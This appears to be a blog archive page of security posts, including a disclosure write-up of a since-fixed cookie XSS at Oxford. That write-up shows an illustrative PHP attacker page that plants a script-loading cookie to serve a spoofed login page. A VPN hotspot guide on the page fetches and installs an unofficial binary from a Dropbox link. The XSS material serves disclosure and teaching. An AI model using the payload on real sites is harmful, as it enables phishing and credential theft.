Defeating Quantum Algorithms with Hash Functions

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

In this post I’ll explain why quantum computers are useless for finding hash function collisions, and how we can leverage this powerlessness to build post-quantum signature schemes. I’ll then describe a quantum computing model that you can try at home, and one where hash function collisions are easy to find…

TLS 1.3 FTW

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

In common slang, FTW is an acronym “for the win” and while that’s appropriate here, I think a better expansion is “for the world.”

We’re pleased to announce that we have sponsored the development of TLS 1.3 in OpenSSL. As it is one of the most widely-used TLS libraries, it is a good investment for the overall health and security of the Internet, so that everyone is able to deploy TLS 1.3 as soon as possible…

Against DNSSEC

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

All secure crypto on the Internet assumes that DNS lookups from names to IP addresses are insecure. Securing those DNS lookups therefore enables no meaningful security. DNSSEC does make some attacks against insecure sites harder. But it doesn’t make those attacks infeasible, so sites still need to adopt secure transports like TLS. With TLS properly configured, DNSSEC adds nothing…

Troy Hunt: HTTPS adoption has reached the tipping point

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

That’s it – I’m calling it – HTTPS adoption has now reached the moment of critical mass where it’s gathering enough momentum that it will very shortly become “the norm” rather than the exception it so frequently was in the past. In just the last few months, some really significant things have happened that caused me to make this call; here’s why I think we’re now at that tipping point…

NIST’s new password rules – what you need to know

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

It’s no secret. We’re really bad at passwords. Nevertheless, they aren’t going away any time soon.

With so many websites and online applications requiring us to create accounts and think up passwords in a hurry, it’s no wonder so many of us struggle to follow the advice of so-called password security experts.

Stereotypical hacker in a hoodie, from the article.

At the same time, the computing power available for password cracking just gets bigger and bigger.

OK, so I started with the bad news, but this cloud does have a silver lining…

Breaking https’ AES-GCM (or a part of it)

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

The coolest talk of this year’s Blackhat must have been the one by Sean Devlin and Hanno Böck. The talk summarized a paper from earlier this year in a very cool way: Sean walked on stage and announced that he didn’t have his slides. He then said that it didn’t matter, because he had a good idea of how to retrieve them…

A hacker 'steals his own slides back'

Anatomy of Cookie XSS

A cross-site scripting vulnerability (shortened to XSS, because CSS already means other things) occurs when a website can be tricked into showing a visitor unsafe content that came from another site visitor. Typically when we talk about an XSS attack, we’re talking about tricking a website into sending Javascript code to the user: that Javascript code can then be used to steal cookies and credentials, vandalise content, and more.

Good web developers know to sanitise input – making anything given to their pages by a user safe before ever displaying it on a page – but even the best can forget quite how many things really are “user input”.
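
To illustrate the principle, here’s a minimal, hypothetical PHP sketch (not the actual vulnerable page) of the difference one function call can make:

<?php
// Hypothetical example: echoing a query-string parameter back to the visitor.

// UNSAFE: whatever the visitor (or a link they clicked on) put into ?name=...
// is injected straight into the page, <script> tags and all.
echo 'Hello, ' . $_GET['name'];

// SAFER: escape HTML metacharacters before output, so any injected markup is
// displayed as text rather than executed by the browser.
echo 'Hello, ' . htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8');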

"Who Am I?" page provided by University of Oxford IT Services.
This page outputs a variety of your inputs right back at you.

Recently, I reported a vulnerability in one of the University of Oxford’s IT Services‘ web pages that’s a great example of this. The page (which isn’t accessible from the public Internet, and is now fixed) is designed to help network users diagnose problems. When you connect to it, it tells you a lot of information about your connection: what browser you’re using, your reverse DNS lookup and IP address, etc. The developer clearly understood that XSS was a risk, because if you pass a query string to the page, it’s escaped before it’s returned back to you. But unfortunately, the developer didn’t consider that virtually nothing given to you by the browser can be trusted.

My Perl program, injecting XSS code into the user's cookie and then redirecting them.
To demonstrate this vulnerability, I had the option of writing Perl or Javascript. For some reason, I chose Perl.

In this case, I noticed that the page would output any cookies that you had from the .ox.ac.uk domain, without escaping them. .ox.ac.uk cookies can be manipulated by anybody who has access to write pages on the domain, which – thanks to the users.ox.ac.uk webspace – means any staff or students at the University (or, in an escalation attack, anybody who’s already compromised the account of a staff member or student). An attacker can set up a web page that plants such a “poisoned” cookie and then redirects the user to the affected page, and from there do whatever they want. In my case, I experimented with showing a fake single sign-on login page, almost indistinguishable from the real thing (it even has a legitimate-looking .ox.ac.uk domain name served over an HTTPS connection, padlock and all). At this stage, a real attacker could use a spear phishing scam to trick users into clicking a link to their page and start stealing credentials.
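
My actual demonstration was written in Perl, but a sketch of the attacker’s page might look something like this (the cookie name, script URL and redirect target are all invented for illustration):

<?php
// Hypothetical attacker's page, hosted anywhere under .ox.ac.uk (e.g. in the
// users.ox.ac.uk webspace). It plants a "poisoned" cookie scoped to the shared
// parent domain, then redirects the victim to the vulnerable diagnostic page,
// which echoed cookies back without escaping them.
$payload = "<script src='//users.ox.ac.uk/~attacker/fake-sso.js'></script>";

// Emit the Set-Cookie header directly; strictly speaking, spaces and quotes
// push the limits of what a cookie value may contain, but browsers are lenient.
header('Set-Cookie: diag_note=' . $payload . '; Domain=.ox.ac.uk; Path=/');

// Bounce the victim on to the vulnerable page.
header('Location: https://diagnostics.example.ox.ac.uk/whoami');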

A fake SSO login page, delivered from a legitimate-looking https URL.
The padlock, the HTTPS URL, and the convincing form make this page look legitimate. But it’s actually spoofed.

I’m sure that I didn’t need to explain why XSS vulnerabilities are dangerous. But I wanted to remind you all that truly anything that comes from the user’s web browser, even if you think that you probably put it there yourself, can’t be trusted. When you’re defending against XSS attacks, your aim isn’t just to sanitise obvious user input like GET and POST parameters, but also anything that arrives in a browser header, including cookies and the Referer header – especially if your domain name carries websites managed by many different people. In an ideal world, Content Security Policy would mitigate all these kinds of attacks: but in our real world – sanitise those inputs!
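
For what it’s worth, a policy along these lines (illustrative values only) tells the browser to refuse inline scripts and scripts loaded from anybody else’s corner of the domain, even if an unescaped cookie does slip through:

<?php
// Illustrative Content Security Policy header: only run scripts that this site
// serves itself; injected inline <script> blocks and scripts pulled in from
// elsewhere on .ox.ac.uk are blocked by the browser.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");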


Payment Redirection Fraud

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

Here is an example scenario… You receive an email requesting a payment. It could be for rent, it could be fees for a course or any other legitimate reason. Typically, the payment is a significant sum. The email contains the banking details you need to make the payment. Then shortly after the first email arrives…

Raspberry Pi VPN Hotspot (or How To Infuriate Theresa May For Under £40)

As you’re no-doubt aware, Home Secretary Theresa May is probably going to get her way with her “snooper’s charter” by capitalising on events in Paris (even though that makes no sense), and before long, people working for law enforcement will be able to read your Internet usage history without so much as a warrant (or, as the UN’s privacy chief put it, it’s “worse than scary”).

John Oliver on Last Week Tonight discusses the bill.
Or as John Oliver put it, “This bill could write into law a huge invasion of privacy.” Click to see a clip.

In a revelation that we should be thankful for as much as we’re terrified by, our government does not understand how the Internet works. And that’s why it’s really easy for somebody with only a modicum of geekery to almost-completely hide their online activities from observation by their government and simultaneously from hackers. Here’s a device that I built the other weekend, and below I’ll tell you how to do it yourself (and how it keeps you safe online from a variety of threats, as well as potentially giving you certain other advantages online):

"Iceland", one of my Raspberry Pi VPN hotspots
It’s small, it’s cute, and it goes a long way to protecting my privacy online.

I call it “Iceland”, for reasons that will become clear later. But a more-descriptive name would be a “Raspberry Pi VPN Hotspot”. Here’s what you’ll need if you want to build one:

  • A Raspberry Pi Model B (or later) – you can get these for less than £30 online, and it’ll come with an SD card that’ll let it boot Raspbian, which is the Linux distribution I’ve used in my example: there’s no reason you couldn’t use another one if you’re familiar with it
  • A USB WiFi dongle that supports “access point” mode – I’m using an Edimax one that cost me under a fiver – but it took a little hacking to make it work – I’ve heard that Panda and RALink dongles are easier
  • A subscription to a VPN with OpenVPN support and at least one endpoint outside of the UK – I’m using VyprVPN because I have a special offer, but there are lots of cheaper options: here’s a great article about choosing one
  • A basic familiarity with a *nix command line, an elementary understanding of IP networking, and a spare 20 minutes.

From here on, this post gets pretty geeky. Unless you plan on building your own little box to encrypt all of your home’s WiFi traffic until it’s well out of the UK and close-to-impossible to link to you personally (which you should!), then you probably ought to come back to it another time.

Here’s how it’s done:

1. Plug in, boot, and install some prerequisites

Plug the WiFi dongle into a USB port and connect the Ethernet port to your Internet router.  Boot your Raspberry Pi into Raspbian (as described in the helpsheet that comes with it), and run:

sudo apt-get install bridge-utils hostapd udhcpd bind9 openvpn

2. Make HostAPD support your Edimax dongle

If, like me, you’re using an Edimax dongle, you need to do an extra couple of steps to make it work as an access point. Skip this bit if you’re using one of the other dongles I listed or if you know better.

wget http://dl.dropbox.com/u/1663660/hostapd/hostapd.zip
unzip hostapd.zip
sudo mv /usr/sbin/hostapd /usr/sbin/hostapd.original
sudo mv hostapd /usr/sbin/hostapd.edimax
sudo ln -sf /usr/sbin/hostapd.edimax /usr/sbin/hostapd
sudo chown root.root /usr/sbin/hostapd
sudo chmod 755 /usr/sbin/hostapd

3. Set up OpenVPN

Get OpenVPN configuration files from your VPN provider: often these will be available under the iOS downloads. There’ll probably be one for each available endpoint. I chose the one for Reykjavík, because Iceland’s got moderately sensible privacy laws and I’m pretty confident that it would take judicial oversight for British law enforcement to collaborate with Icelandic authorities on getting a wiretap in place, which is the kind of level of privacy I’m happy with. Copy your file to /etc/openvpn/openvpn.conf and edit it: you may find that you need to put your VPN username and password into it to make it work.
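
For illustration only (the endpoint hostname and filenames here are made up – the real values come from your provider’s download), the relevant parts of /etc/openvpn/openvpn.conf might end up looking something like this:

# Illustrative excerpt of /etc/openvpn/openvpn.conf
client
dev tun
proto udp
remote is1.example-vpn.com 1194        # hypothetical Icelandic endpoint
ca /etc/openvpn/ca.crt                 # certificate(s) supplied by your provider

# Point OpenVPN at a file containing your VPN username on the first line and
# your password on the second, so it can connect without prompting:
auth-user-pass /etc/openvpn/credentials.txt

If you use a separate credentials file like this, remember to make it readable only by root (e.g. sudo chmod 600 /etc/openvpn/credentials.txt).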

sudo service openvpn start

You can now test your VPN’s working, if you like. I suggest connecting to the awesome icanhazip.com and asking it where you are (you can use your favourite GeoIP website to tell you what country it thinks you’re in, based on that):

curl -4 icanhazip.com

Another option would be to check with a GeoIP service directly:

curl freegeoip.net/json/

4. Set up your firewall and restart the VPN connection

Unless your VPN provider gives you DNAT (and even if they do, if you’re paranoid), you should set up a firewall to allow only outgoing connections to be established, and then restart your VPN connection:

sudo iptables -A INPUT -i tun0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -i tun0 -j DROP
sudo sh -c "iptables-save > /etc/iptables.nat.vpn.secure"
sudo sh -c "echo 'up iptables-restore < /etc/iptables.nat.vpn.secure' >> /etc/network/interfaces"
sudo service openvpn restart

5. Configure your WiFi hotspot

Configure bind as your DNS server, forwarding requests to and caching responses from Google’s DNS servers, or another DNS server that you trust. Alternatively, you can just configure your DHCP clients to use Google’s DNS servers directly, but caching will probably improve your performance overall. To do this, add a forwarder to /etc/bind/named.conf.options:

forwarders {
  8.8.8.8;
  8.8.4.4;
};

Restart bind, and make sure it loads on boot:

sudo service bind9 restart
sudo update-rc.d bind9 enable

Edit /etc/udhcpd.conf. As a minimum, you should have a configuration along these lines (you might need to tweak your IP address assignments to fit with your local network – the “router” and “dns” settings should be set to the IP address you’ll give to your Raspberry Pi):

start 192.168.0.2
end 192.168.0.254
interface wlan0
remaining yes
opt dns 192.168.0.1
option subnet 255.255.255.0
opt router 192.168.0.1
option lease 864000 # 10 days

Enable DHCP by uncommenting (remove the hash!) the following line in /etc/default/udhcpd:

#DHCPD_ENABLED="yes"

Set a static IP address on your Raspberry Pi in the same subnet as you configured above (but not between the start and end of the DHCP list):

sudo ifconfig wlan0 192.168.0.1

And edit your /etc/network/interfaces file to configure it to retain this on reboot (you’ll need to use tabs, not spaces, for indentation):

iface wlan0 inet static
  address 192.168.0.1
  netmask 255.255.255.0

And comment out the lines relating to hot-plugging of WiFi adapters/network hopping:

#allow-hotplug wlan0
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
#iface default inet manual

Right – onto hostapd, the fiddliest of the tools you’ll have to configure. Create or edit /etc/hostapd/hostapd.conf as follows, but substitute in your own SSID, hotspot password, and channel (to minimise interference, which can slow your network down, I recommend using a WiFi scanner tool on your mobile to find which channels your neighbours aren’t using, and picking one of those – you should probably avoid the channel your normal WiFi uses, too, so you don’t slow your own connection down with crosstalk):

interface=wlan0
driver=nl80211
ssid=your network name
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=your network password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

Hook up this configuration by editing /etc/default/hostapd:

DAEMON_CONF="/etc/hostapd/hostapd.conf"

Fire up the hotspot, and make sure it runs on reboot:

sudo service hostapd start
sudo service udhcpd start
sudo update-rc.d hostapd enable
sudo update-rc.d udhcpd enable

Finally, set up NAT so that people connecting to your new hotspot are forwarded through the IP tunnel of your VPN connection:

sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
sudo sh -c "echo net.ipv4.ip_forward=1 >> /etc/sysctl.conf"
sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
sudo sh -c "iptables-save > /etc/iptables.nat.vpn.secure"

6. Give it a go!

Connect to your new WiFi hotspot, and go to your favourite GeoIP service. Or, if your VPN endpoint gives you access to geographically-limited services, give those a go (you’d be amazed how different the Netflix catalogues are in different parts of the world). And give me a shout if you need any help or if you have any clever ideas about how this magic little box can be improved.


Squiz CMS Easter Eggs (or: why do I keep seeing Greg’s name in my CAPTCHA?)

Anybody who has, like me, come into contact with the Squiz Matrix CMS for any length of time will have come across the reasonably easy-to-read but remarkably long CAPTCHA that it shows. These are especially-noticeable in its administrative interface, where it uses them as an exaggerated and somewhat painful “are you sure?” – restarting the CMS’s internal crontab manager, for example, requires that the administrator types a massive 25-letter CAPTCHA.

Four long CAPTCHA from the Squiz Matrix CMS.

But there’s another interesting phenomenon that one begins to notice after seeing enough of the back-end CAPTCHA. Strange patterns of letters appear in sequence more often than would be expected by chance. If you’re a fan of wordsearches, take a look at the composite screenshot above: can you find a person’s name in each of the four lines?

Four long CAPTCHA from the Squiz Matrix CMS, with the names Greg, Dom, Blair and Marc highlighted.

There are four names – Greg, Dom, Blair and Marc – which routinely appear in these CAPTCHA. Blair, being the longest name, was the first that I noticed, and at first I thought that it might represent a fault in the pseudorandom number generation being used that was resulting in a higher-than-normal frequency of this combination of letters. Another idea I toyed with was that the CAPTCHA text might be generated entirely from a set of pronounceable syllables (which is a reasonable way to generate one-time passwords that resist entry errors resulting from reading difficulties: in fact, we do this at Three Rings), in which these four names also appear, but by now I’d have thought that I’d have noticed this in other patterns, and I hadn’t.

Instead, then, I had to conclude that these names were some variety of Easter Egg.

In software (and other media), "Easter Eggs" are undocumented hidden features, often in the form of inside jokes.
Smiley decorated eggs. Picture courtesy Kate Ter Haar.

I was curious about where they were coming from, so I searched the source code: while I found plenty of references to Greg Sherwood, Marc McIntyre, and Blair Robertson, I couldn’t find Dom. I’ve since come to discover that he must be Dominic Wong – these four were, according to Greg’s blog, developers with Squiz in the early 2000s, and seemingly saw themselves as a dynamic foursome responsible for the majority of the CMS’s code (which, if the comment headers are to be believed, remains true).

Greg, Marc, Blair and Dom, as depicted in Greg’s 2007 blog post.

That still didn’t explain why searching for their names in the source didn’t find the responsible code. I started digging through the CMS’s source code, where I eventually found fudge/general/general.inc (a lot of Squiz CMS code is buried in a folder called “fudge”, and web addresses used internally sometimes contain this word, too: I’d like to believe that it’s being used as a noun and that the developers were just fans of the buttery sweet, but I have a horrible feeling that it was used in its popular verb form). In that file, I found this function definition:

/**
 * Generates a string to be used for a security key
 *
 * @param int            $key_len                the length of the random string to display in the image
 * @param boolean        $include_uppercase      include uppercase characters in the generated password
 * @param boolean        $include_numbers        include numbers in the generated password
 *
 * @return string
 * @access public
 */
function generate_security_key($key_len, $include_uppercase = FALSE, $include_numbers = FALSE) {
  $k = random_password($key_len, $include_uppercase, $include_numbers);
  if ($key_len > 10) {
    $gl = Array('YmxhaXI=', 'Z3JlZw==', 'bWFyYw==', 'ZG9t');
    $g = base64_decode($gl[rand(0, (count($gl) - 1)) ]);
    $pos = rand(1, ($key_len - strlen($g)));
    $k = substr($k, 0, $pos) . $g . substr($k, ($pos + strlen($g)));
  }
  return $k;
} //end generate_security_key()

For the benefit of those of you who don’t speak PHP, especially PHP that’s been made deliberately hard to decipher, here’s what’s happening when “generate_security_key” is being called:

  • A random password is being generated.
  • If that password is longer than 10 characters, a random part of it is replaced with either “blair”, “greg”, “marc”, or “dom”. The reason that you can’t see these words in the code is that they’re trivially-encoded using a scheme called Base64 – YmxhaXI=, Z3JlZw==, bWFyYw==, and ZG9t are the Base64 representations of the four names (see the snippet below).
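
A quick check (mine, not Squiz’s) confirms the decoding:

<?php
// Decode the obfuscated names found in fudge/general/general.inc.
$gl = Array('YmxhaXI=', 'Z3JlZw==', 'bWFyYw==', 'ZG9t');
foreach ($gl as $encoded) {
  echo $encoded . ' => ' . base64_decode($encoded) . "\n";  // blair, greg, marc, dom
}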

This seems like a strange choice of Easter Egg: immortalising the names of your developers in CAPTCHA. It seems especially strange because it somewhat weakens the (already-weak) CAPTCHA: an attacking robot can quickly be configured to know that an 11+-letter codeword will always consist of letters and exactly one instance of one of these four names. In fact, knowing that a CAPTCHA will always contain one of these four and that I can refresh until I get one that I like, I can quickly turn an 11-letter CAPTCHA into a 6-letter one simply by refreshing until I get one with the longest name – Blair – in it!

A lot has been written about how Easter Eggs undermine software security (in exchange for a small boost to developer morale) – that’s a major part of why Microsoft has banned them from its operating systems (and, for the most part, Apple has too). Given that these particular CAPTCHA in Squiz CMS are often nothing more than awkward-looking “are you sure?” dialogs, I’m not concerned about the direct security implications, but it does make me worry a little about the developer culture that produced them.

I know that this Easter Egg might be harmless, but there’s no way for me to know (short of auditing the entire system) what other Easter Eggs might be hiding under the surface and what they do, especially if the developers have, as in this case, worked to cover their tracks! It’s certainly the kind of thing I’d worry about if I were, I don’t know, a major government that uses Squiz software, especially their cloud-hosted variants, which are harder to effectively audit. Just a thought.


Social Engineering of the Day

This afternoon I was sent out to a distant corner of Oxford University, to which I’d never been before, in order to deliver a lecture on information and computer security. I just wanted to share the exchange that happened when I arrived, because it’s so delightfully ironic:

Dan walks into the building and, seeing the security gates, walks up to the reception desk. Papers left loose on the reception desk indicate that a lecture on security is happening today.

Dan: [pointing at his name on the papers] That’s me. I’m here to deliver the presentation on security. Where should I go?

Receptionist: I’ll buzz you through the gate – go down the stairs, and to the end of the corridor. There’ll be swipe-locked doors you can’t get through, but just hang around for a minute or so and you’ll be able to follow somebody else through.

That’s right – I turned up at a building in order to teach the people there about security, and – without identifying myself any more than pointing at a piece of paper and saying “that’s me” – was given a temporary ID card and encouraged to piggyback my way through their checkpoints. I guess they needed me more than they thought!

Something like HTTPS Everywhere for new Opera?

This self-post was originally posted to /r/operabrowser. See more things from Dan's Reddit account.

I’m looking for an extension that will automatically redirect-to-HTTPS for particular domains, e.g. to ensure that I’m using the secure version of Wikipedia, etc., whenever I go there. The HTTPS Everywhere plugin from the EFF does this for Firefox and Chrome; what can I do to make this work in Opera?

Phone Security == Computer Security

The explosion of smartphone ownership over the last decade has put powerful multi-function computers into the pockets of almost half of us. But despite the fact that the average smartphone contains at least as much personally-identifiable information as its owner keeps on their home computer (or in dead-tree form) at their house – and is significantly more-prone to opportunistic theft – many users put significantly less effort into protecting their mobile’s data than they do the data they keep at home.

Nokia E7, showing lock screen.
Too late, little Nokia E7: I’ve got physical access to you now.

I have friends who religiously protect their laptops and pendrives with TrueCrypt, axCrypt, or similar, but still carry around an unencrypted mobile phone. What we’re talking about here is a device that contains all of the contact details for you and everybody you know, as well as potentially copies of all of your emails and text messages, call histories, magic cookies for social networks and other services, saved passwords, your browsing history (some people would say that’s the most-incriminating thing on their phone!), authentication apps, photos, videos… more than enough information for an attacker to pursue a highly-targeted identity theft or phishing attack.

Pattern lock configuration on an Android mobile phone.
Android pattern lock: no encryption, significantly less-random than an equivalent-length PIN, and easily broken by a determined attacker.

“Pattern lock” is popular because it’s fast and convenient. It might be good enough to stop your kids from using your phone without your permission (unless they’re smart enough to do some reverse smudge engineering: looking for the smear-marks made by your fingers as you unlock the device; and let’s face it, they probably are), but it doesn’t stand up to much more than that. Furthermore, gesture unlock solutions dramatically reduce the number of permutations, because you can’t visit the same point twice: so much so that you can easily perform a rainbow table attack on the SHA1 hash to reverse-engineer somebody’s gesture. Even if Android applied a per-device pseudorandom salt to the gesture pattern (it doesn’t, so you can download a prefab table), it doesn’t take long to generate an SHA1 lookup of just 895,824 codes (maybe Android should have listened to Coda Hale’s advice and used BCrypt, or else something better still).
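
If I’ve remembered the details correctly, older versions of Android stored the pattern as an unsalted SHA1 of the sequence of visited node indices (0–8), which is why building the whole lookup table is so quick. A rough, simplified sketch of the idea:

<?php
// Rough sketch: hash a gesture the way (to the best of my knowledge) older
// Android versions did - an unsalted SHA1 of the visited node indices as bytes.
$pattern = array(0, 4, 8, 5);                      // an example swipe across four nodes
$hash = sha1(implode(array_map('chr', $pattern))); // no salt, so one table fits all devices
echo $hash . "\n";
// Enumerating every legal pattern (4-9 distinct nodes, respecting the adjacency
// rules) yields only 895,824 hashes to precompute - seconds of work.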

iPhone showing the PIN lock screen.
An encrypted iPhone can be configured to resist brute-force attacks by wiping the phone after repeated failures, which replaces one security fault (brute-force weakness) with another (a denial of service attack that’s so easy that your friends can do it by accident).

These attacks, though (and the iPhone isn’t bulletproof, either), are all rather academic, because they are trumped by the universal rule that once an attacker has physical access to your device, it is compromised. This is fundamentally why mobile security should be considered equivalent to computer security. All of the characteristics that make mobile devices distinctive (portability, ubiquity, processing power, etc.) are also weaknesses, and that’s why smartphones deserve at least as much protection as desktop computers protecting the same data. Mobile-specific features like “remote wipe” are worth having, but can’t be relied upon alone – a wily attacker could easily keep your phone in a lead box or otherwise disable its connectivity features until it’s cracked.

A finger swipes-to-unlock a Samsung mobile phone.
The bottom line: if the attacker gets hold of your phone, you’re only as safe as your encryption.

The only answer is to encrypt your device (with a good password). Having to tap in a PIN or password may be less-convenient than just “swipe to unlock”, but it gives you a system that will resist even the most-thorough efforts to break it, given physical access (last year’s iPhone 4 vulnerability notwithstanding).

It’s still not perfect – especially here in the UK, where the RIPA can be used (and has been used) to force key surrender. What we really need is meaningful, usable “whole system” mobile encryption with plausible deniability. But so long as you’re only afraid of identity thieves and phishing scammers, and not being forced to give up your password by law or under duress, then it’s “good enough”.

Of course, it’s only any use if it’s enabled before your phone gets stolen! Like backups, security is one of those things that everybody should make a habit of thinking about. Go encrypt your smartphone; it’s remarkably easy –

Rave Reviews for Your Password Sucks

Last month, I volunteered myself to run a breakout session at the 2012 UAS Conference, an annual gathering of up to a thousand Oxford University staff. I’d run a 2-minute micropresentation at the July 2011 OxLibTeachMeet called “Your Password Sucks!”, and I thought I’d probably be able to expand that into a larger 25-minute breakout session.

Your password: How bad guys will steal your identity
My expanded presentation was called “Your password: How bad guys will steal your identity”, because I wasn’t sure that I’d get away with the title “Your Password Sucks” at a larger, more-formal event.

The essence of my presentation boiled down to demonstrating four points. The first was you are a target – dispelling the myth that the everyday person can consider themselves safe from the actions of malicious hackers. I described the growth of targeted phishing attacks, and relayed the sad story of Mat Honan’s victimisation by hackers.

The second point was that your password is weak: I described the characteristics of good passwords (e.g. sufficiently long, complex, random, and unique) and pointed out that even among folks who’d gotten a handle on most of these factors, uniqueness was still the one that tripped people up. A quarter of people use only a single password for most or all of their accounts, and over 50% use 5 or fewer passwords across dozens of accounts.

You are a target. Your password is weak. Attacks are on the rise. You can protect yourself.
The four points I wanted to make through my presentation. Starting by scaring everybody ensured that I had their attention right through ’til I told them what they could do about it, at the end.

Next up: attacks are on the rise. By a combination of statistics, anecdotes, audience participation and a theoretical demonstration of how a hacker might exploit shared-password vulnerabilities to gradually take over somebody’s identity (and then use it as a platform to attack others), I aimed to show that this is not just a hypothetical scenario. These attacks really happen, and people lose their money, reputation, or job over them.

Finally, the happy ending to the story: you can protect yourself. Having focussed on just one aspect of password security (uniqueness), and filling a 25-minute slot with it, I wanted to give people some real, practical suggestions for addressing it. These came in the form of free suggestions that they could implement today. I suggested “cloud” options (like LastPass or 1Password), hashing options (like SuperGenPass), and “offline” technical options (like KeePass or a spreadsheet bundled into a TrueCrypt volume).
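
To give a flavour of how the hashing options work (this is only the concept; it’s not SuperGenPass’s actual algorithm), the trick is to derive each site’s password from your one memorised master password plus the site’s domain, so that nothing needs to be stored anywhere:

<?php
// Conceptual sketch of a hash-based per-site password generator (not the real
// SuperGenPass algorithm): master password + domain in, unique password out.
function site_password($master, $domain, $length = 12) {
  $digest = hash('sha256', $master . ':' . $domain, true); // raw binary digest
  return substr(base64_encode($digest), 0, $length);
}

echo site_password('correct horse battery staple', 'example.com') . "\n";
// A different domain yields a completely different password, but you only ever
// have to remember the one master password.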

I even suggested a non-technical option involving a “master” password that is accompanied by one of several unique prefixes. The prefixes live on a Post-It Note in your wallet. Want a backup? Take a picture of them with your mobile: they’re worthless without the master password, which lives in your head. It’s not as good as a hash-based solution, because a crafty hacker who breaks into several systems might be able to determine your master password, but it’s “good enough” for most people and a huge improvement on using just 5 passwords everywhere! (another great “offline” mechanism is Steve Gibson’s Off The Grid system)

"Delivery" ratings for the UAS Conference "breakout" sessions
My presentation – marked on the above chart – left people “Very Satisfied” significantly more than any other of the 50 breakout sessions.

And it got fantastic reviews! That pleased me a lot. The room was packed, and eventually more chairs had to be brought in for the 70+ folks who decided that my session was “the place to be”. The resulting feedback forms made me happy, too: on both Delivery and Content, I got more “Very Satisfied” responses than any other of the 50 breakout sessions, as well as specific comments. My favourite was:

Best session I have attended in all UAS conferences. Dan Q gave a 5 star performance.

So yeah; hopefully they’ll have me back next year.
